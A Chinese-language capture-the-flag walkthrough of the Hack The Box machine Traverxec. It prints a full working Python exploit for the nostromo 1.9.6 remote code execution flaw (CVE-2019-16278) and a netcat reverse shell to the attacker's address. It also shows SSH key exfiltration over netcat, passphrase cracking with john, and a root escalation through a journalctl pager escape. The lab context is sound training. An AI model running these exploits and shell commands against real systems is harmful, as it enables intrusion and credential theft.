Hack-The-Box-walkthrough[Traverxec]

Posted on Edited on In Views: Word count in article: 2.4k Reading time ≈ 9 mins.

介绍

操作系统:Linux
难度:容易
点数:20
发行:2019年11月16日
IP:10.10.10.165

user一血用时:2小时26分钟49秒。
root一血用时:3小时06分钟28秒。

信息收集

上nmap

1
2
3
4
C:\Users\HASEE>nmap -p- -v -sV 10.10.10.165 --min-rate=1000 -T4
PORT   STATE SERVICE    VERSION
22/tcp open  tcpwrapped
80/tcp open  tcpwrapped
1
2
3
4
5
6
7
8
9
10
C:\Users\HASEE>nmap -p 22,80 -v -A -T4 10.10.10.165
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|_  256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
80/tcp open  http    nostromo 1.9.6
|_http-favicon: Unknown favicon MD5: FED84E16B6CCFE88EE7FFAAE5DFEFD34
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC

扫描显示端口22和80是打开的。Nmap将HTTP-server-header报告为nostromo 1.9.6,这意味着该框正在运行nostromo HTTP服务。

Nostromo或nhttpd是一个开源web服务器。

网页似乎没有显示任何有趣的东西,Gobuster扫描也没有发现任何有用的东西。

人工利用

经过一些研究,nostromo版本1.9.6有一个远程代码执行漏洞。

  • nostromo-1.9.6-Remote-Code-Execution

现在下载python漏洞利用脚本并按如下方式执行它

先查看exploit的内容

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
# Exploit Title: nostromo 1.9.6 - Remote Code Execution
# Date: 2019-12-31
# Exploit Author: Kr0ff
# Vendor Homepage:
# Software Link: http://www.nazgul.ch/dev/nostromo-1.9.6.tar.gz
# Version: 1.9.6
# Tested on: Debian
# CVE : CVE-2019-16278

cve2019_16278.py

#!/usr/bin/env python

import sys
import socket

art = """

                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/    



"""

help_menu = '\r\nUsage: cve2019-16278.py <Target_IP> <Target_Port> <Command>'

def connect(soc):
    response = ""
    try:
        while True:
            connection = soc.recv(1024)
            if len(connection) == 0:
                break
            response += connection
    except:
        pass
    return response

def cve(target, port, cmd):
    soc = socket.socket()
    soc.connect((target, int(port)))
    payload = 'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0\r\nContent-Length: 1\r\n\r\necho\necho\n{} 2>&1'.format(cmd)
    soc.send(payload)
    receive = connect(soc)
    print(receive)

if __name__ == "__main__":

    print(art)
    
    try:
        target = sys.argv[1]
        port = sys.argv[2]
        cmd = sys.argv[3]

        cve(target, port, cmd)
   
    except IndexError:
        print(help_menu)

然后利用脚本执行命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
C:\Users\HASEE\Desktop\hack the box靶机渗透\Traverxec>python exploit.py 10.10.10.165 80 id


                                        _____-2019-16278
        _____  _______    ______   _____\    \
   _____\    \_\      |  |      | /    / |    |
  /     /|     ||     /  /     /|/    /  /___/|
 /     / /____/||\    \  \    |/|    |__ |___|/
|     | |____|/ \ \    \ |    | |       \
|     |  _____   \|     \|    | |     __/ __
|\     \|\    \   |\         /| |\    \  /  \
| \_____\|    |   | \_______/ | | \____\/    |
| |     /____/|    \ |     | /  | |    |____/|
 \|_____|    ||     \|_____|/    \|____|   | |
        |____|/                        |___|/




HTTP/1.1 200 OK
Date: Wed, 22 Apr 2020 02:12:04 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

为了得到一个反向shell,可以使用Netcat。运行脚本,并在本地机器上启动一个Netcat侦听器。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~/vulnhub/Traverxec# python exploit.py 10.10.10.165 80 "nc -c /bin/sh 10.10.15.136 5566"


                                        _____-2019-16278
        _____  _______    ______   _____\    \   
   _____\    \_\      |  |      | /    / |    |  
  /     /|     ||     /  /     /|/    /  /___/|  
 /     / /____/||\    \  \    |/|    |__ |___|/  
|     | |____|/ \ \    \ |    | |       \        
|     |  _____   \|     \|    | |     __/ __     
|\     \|\    \   |\         /| |\    \  /  \    
| \_____\|    |   | \_______/ | | \____\/    |   
| |     /____/|    \ |     | /  | |    |____/|   
 \|_____|    ||     \|_____|/    \|____|   | |   
        |____|/                        |___|/

成功的收到了反弹回来的shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@kali:~# nc -lvp 5566
listening on [any] 5566 ...
10.10.10.165: inverse host lookup failed: Unknown host
connect to [10.10.15.136] from (UNKNOWN) [10.10.10.165] 47074
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data
python -c 'import pty; pty.spawn("/bin/bash")'
www-data@traverxec:/usr/bin$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@traverxec:/usr/bin$ whoami
whoami
www-data

还可以使用metasploit

还可以使用Metasploit模块来利用这个漏洞。开始Metasploit并尝试利用它。

1
2
3
4
5
msfconsole
msf > use exploit/multi/http/nostromo_code_exec
msf > set rhosts 10.10.10.165
msf > set lhost 10.10.15.136
msf > run

横向移动

枚举系统来查找提权向量。/etc/passwd文件显示一个名为david的用户。

它还显示Nostromo web根目录是/var/nostromo/。

文件夹/var/nostromo/conf包含web服务器配置文件。

文件nhttpd.conf和.htpasswd看起来很有趣。

.htpasswd包含一个密码散列,这个散列是可破解的,但是它没有任何用处。
conf文件包含以下配置。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
www-data@traverxec:/var/nostromo/conf$ ls
ls
mimes  nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
cat nhttpd.conf
# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

HOMEDIRS部分确定用户的主目录中可能有一个public_www文件夹。

用户的主目录不可读,但是发现public_www是可访问的。

该文件夹包含protected-file-area子文件夹。

1
2
3
4
5
www-data@traverxec:/var/nostromo/conf$ cd /home/david/public_www/protected-file-area
<conf$ cd /home/david/public_www/protected-file-area
www-data@traverxec:/home/david/public_www/protected-file-area$ ls
ls
backup-ssh-identity-files.tgz

文件夹的枚举显示一些备份的SSH密钥。用netcat把它们转移到本地box里。在本地运行以下命令以接收文件。

1
2
root@kali:~/vulnhub/Traverxec# nc -lvp 1234 > backup.tgz
listening on [any] 1234 ...

接下来,在服务器上运行以下命令来完成传输。

1
2
www-data@traverxec:/home/david/public_www/protected-file-area$ nc 10.10.15.136 1234 < backup-ssh-identity-files.tgz
<c 10.10.15.136 1234 < backup-ssh-identity-files.tgz

kali端成功收到了文件

1
2
3
4
5
6
root@kali:~/vulnhub/Traverxec# ls -la
总用量 16
drwxr-xr-x  2 root root 4096 4月  21 22:58 .
drwxrwxrwx 21 root root 4096 4月  21 22:32 ..
-rw-r--r--  1 root root 1915 4月  21 23:01 backup.tgz
-rw-r--r--  1 root root 1503 4月  21 22:33 exploit.py

提取backup.tgz中的文件。

1
2
3
4
5
6
7
root@kali:~/vulnhub/Traverxec# tar -xvf backup.tgz 
home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub
root@kali:~/vulnhub/Traverxec# ls
backup.tgz  exploit.py  home

发现归档文件包含SSH密钥,其中可以使用私有密钥id_rsa作为david用户登录。

1
2
3
4
5
6
root@kali:~/vulnhub/Traverxec/home/david/.ssh# ssh -i id_rsa david@10.10.10.165
The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.165' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':

但是,私钥是加密的,需要密码。用john来试着破解它。首先,使用ssh2john从RSA密钥中提取散列。

1
2
3
4
5
6
7
root@kali:~/vulnhub/Traverxec/home/david/.ssh# python3 /usr/share/john/ssh2john.py id_rsa > hash.txt
/usr/share/john/ssh2john.py:103: DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes()
  data = base64.decodestring(data)
root@kali:~/vulnhub/Traverxec/home/david/.ssh# ls
authorized_keys  hash.txt  id_rsa  id_rsa.pub
root@kali:~/vulnhub/Traverxec/home/david/.ssh# cat hash.txt 
id_rsa:$sshng$1$16$477EEFFBA56F9D283D349033D5D08C4F$1200$b1ec9e1ff7de1b5f5395468c76f1d92bfdaa7f2f29c3076bf6c83be71e213e9249f186ae856a2b08de0b3c957ec1f086b6e8813df672f993e494b90e9de220828aee2e45465b8938eb9d69c1e9199e3b13f0830cde39dd2cd491923c424d7dd62b35bd5453ee8d24199c733d261a3a27c3bc2d3ce5face868cfa45c63a3602bda73f08e87dd41e8cf05e3bb917c0315444952972c02da4701b5da248f4b1725fc22143c7eb4ce38bb81326b92130873f4a563c369222c12f2292fac513f7f57b1c75475b8ed8fc454582b1172aed0e3fcac5b5850b43eee4ee77dbedf1c880a27fe906197baf6bd005c43adbf8e3321c63538c1abc90a79095ced7021cbc92ffd1ac441d1dd13b65a98d8b5e4fb59ee60fcb26498729e013b6cff63b29fa179c75346a56a4e73fbcc8f06c8a4d5f8a3600349bb51640d4be260aaf490f580e3648c05940f23c493fd1ecb965974f464dea999865cfeb36408497697fa096da241de33ffd465b3a3fab925703a8e3cab77dc590cde5b5f613683375c08f779a8ec70ce76ba8ecda431d0b121135512b9ef486048052d2cfce9d7a479c94e332b92a82b3d609e2c07f4c443d3824b6a8b543620c26a856f4b914b38f2cfb3ef6780865f276847e09fe7db426e4c319ff1e810aec52356005aa7ba3e1100b8dd9fa8b6ee07ac464c719d2319e439905ccaeb201bae2c9ea01e08ebb9a0a9761e47b841c47d416a9db2686c903735ebf9e137f3780b51f2b5491e50aea398e6bba862b6a1ac8f21c527f852158b5b3b90a6651d21316975cd543709b3618de2301406f3812cf325d2986c60fdb727cadf3dd17245618150e010c1510791ea0bec870f245bf94e646b72dc9604f5acefb6b28b838ba7d7caf0015fe7b8138970259a01b4793f36a32f0d379bf6d74d3a455b4dd15cda45adcfdf1517dca837cdaef08024fca3a7a7b9731e7474eddbdd0fad51cc7926dfbaef4d8ad47b1687278e7c7474f7eab7d4c5a7def35bfa97a44cf2cf4206b129f8b28003626b2b93f6d01aea16e3df597bc5b5138b61ea46f5e1cd15e378b8cb2e4ffe7995b7e7e52e35fd4ac6c34b716089d599e2d1d1124edfb6f7fe169222bc9c6a4f0b6731523d436ec2a15c6f147c40916aa8bc6168ccedb9ae263aaac078614f3fc0d2818dd30a5a113341e2fcccc73d421cb711d5d916d83bfe930c77f3f99dba9ed5cfcee020454ffc1b3830e7a1321c369380db6a61a757aee609d62343c80ac402ef8abd56616256238522c57e8db245d3ae1819bd01724f35e6b1c340d7f14c066c0432534938f5e3c115e120421f4d11c61e802a0796e6aaa5a7f1631d9ce4ca58d67460f3e5c1cdb2c5f6970cc598805abb386d652a0287577c453a159bfb76c6ad4daf65c07d386a3ff9ab111b26ec2e02e5b92e184e44066f6c7b88c42ce77aaa918d2e2d3519b4905f6e2395a47cad5e2cc3b7817b557df3babc30f799c4cd2f5a50b9f48fd06aaf435762062c4f331f989228a6460814c1c1a777795104143630dc16b79f51ae2dd9e008b4a5f6f52bb4ef38c8f5690e1b426557f2e068a9b3ef5b4fe842391b0af7d1e17bfa43e71b6bf16718d67184747c8dc1fcd1568d4b8ebdb6d55e62788553f4c69d128360b407db1d278b5b417f4c0a38b11163409b18372abb34685a30264cdfcf57655b10a283ff0

接下来,使用john和rockyou.txt字典破解它。

1
2
3
4
5
6
7
8
9
10
11
12
13
root@kali:~/vulnhub/Traverxec/home/david/.ssh# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter           (id_rsa)
Warning: Only 2 candidates left, minimum 4 needed for performance.
1g 0:00:00:09 DONE (2020-04-21 23:13) 0.1097g/s 1574Kp/s 1574Kc/s 1574KC/sa6_123..*7¡Vamos!
Session completed

显示hunter为密码,使用它来SSH的连接到box。

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~/vulnhub/Traverxec/home/david/.ssh# ssh -i id_rsa david@10.10.10.165
Enter passphrase for key 'id_rsa': 
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Tue Apr 21 19:57:32 2020 from 10.10.15.14
david@traverxec:~$ id
uid=1000(david) gid=1000(david) groups=1000(david),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
david@traverxec:~$ whoami
david
david@traverxec:~$ ls
bin  public_www  user.txt
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d

成功登录并找到了user.txt,然后提交

提权

用户的主目录包含一个名为bin的文件夹,其中包含以下内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
david@traverxec:~$ cd bin
david@traverxec:~/bin$ ls
server-stats.head  server-stats.sh
david@traverxec:~/bin$ cat server-stats.head
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash

cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

最后一行很有趣,因为它使用sudo执行journalctl。运行脚本来查看输出。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
david@traverxec:~/bin$ ./server-stats.sh 
                                                                          .----.
                                                              .---------. | == |
   Webserver Statistics and Data                              |.-"""""-.| |----|
         Collection Script                                    ||       || | == |
          (c) David, 2019                                     ||       || |----|
                                                              |'-.....-'| |::::|
                                                              '"")---(""' |___.|
                                                             /:::::::::::\"    "
                                                            /:::=======:::\
                                                        jgs '"""""""""""""' 

Load:  23:31:53 up 18:20,  1 user,  load average: 0.00, 0.00, 0.00
 
Open nhttpd sockets: 4
Files in the docroot: 117
 
Last 5 journal log lines:
-- Logs begin at Tue 2020-04-21 05:11:04 EDT, end at Tue 2020-04-21 23:31:53 EDT. --
Apr 21 18:32:26 traverxec crontab[10493]: (www-data) LIST (www-data)
Apr 21 18:32:26 traverxec sudo[10666]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/7 ruser=www-data rhost=  user=www-data
Apr 21 18:32:28 traverxec sudo[10666]: pam_unix(sudo:auth): conversation failed
Apr 21 18:32:28 traverxec sudo[10666]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Apr 21 18:32:28 traverxec sudo[10666]: www-data : command not allowed ; TTY=pts/7 ; PWD=/usr/bin ; USER=root ; COMMAND=list

该脚本使用journalctl返回nostromo服务日志的最后5行。

这是可以利用的,因为journalctl调用默认的分页器,而默认的分页器可能更少。

less命令将输出显示在用户的屏幕上,并在显示内容后等待用户输入。

可以通过运行shell命令来利用这一点。

1
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

上面的命令调用less,之后可以通过前缀运行shell命令!。尝试执行/bin/bash。

1
!/bin/bash

成功的提升到root权限并得到了root.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Wed 2020-04-22 00:21:56 EDT, end at Wed 2020-04-22 02:03:27 EDT. --
Apr 22 01:16:05 traverxec sudo[794]: www-data : user NOT in sudoers ; TTY=pts/1 ; PWD=/etc ; USER=root ; COMMAND=/bin/bash
Apr 22 01:58:13 traverxec su[856]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rh
Apr 22 01:58:15 traverxec su[856]: FAILED SU (to root) www-data on none
Apr 22 01:58:28 traverxec su[860]: pam_unix(su:auth): authentication failure; logname= uid=33 euid=0 tty= ruser=www-data rh
Apr 22 01:58:31 traverxec su[860]: FAILED SU (to root) www-data on none
!/bin/bash
root@traverxec:/home/david/bin# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:/home/david/bin# whoami
root
root@traverxec:/home/david/bin# cd /root
root@traverxec:~# ls
nostromo_1.9.6-1.deb  root.txt
root@traverxec:~# cat root.txt
9aa36a6d76f785dfd320a478f6e0d906

知识点总结:

  • nostromo版本1.9.6远程代码执行漏洞
  • nc -c /bin/sh 10.10.15.136 4444 命令反弹shell
  • Metasploit exploit/multi/http/nostromo_code_exec模块反弹shell
  • nc 10.10.15.136 1234 < backup-ssh-identity-files.tgz命令传输文件,并用nc -lvp 1234 > backup.tgz命令接收文件
  • ssh2john从RSA密钥中提取hash散列
  • john和rockyou.txt字典破解提取的hash值
  • /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service命令调用less之后通过前缀运行shell命令!,成功执行/bin/bash从而提权到root。

Game over

The end,to be continue…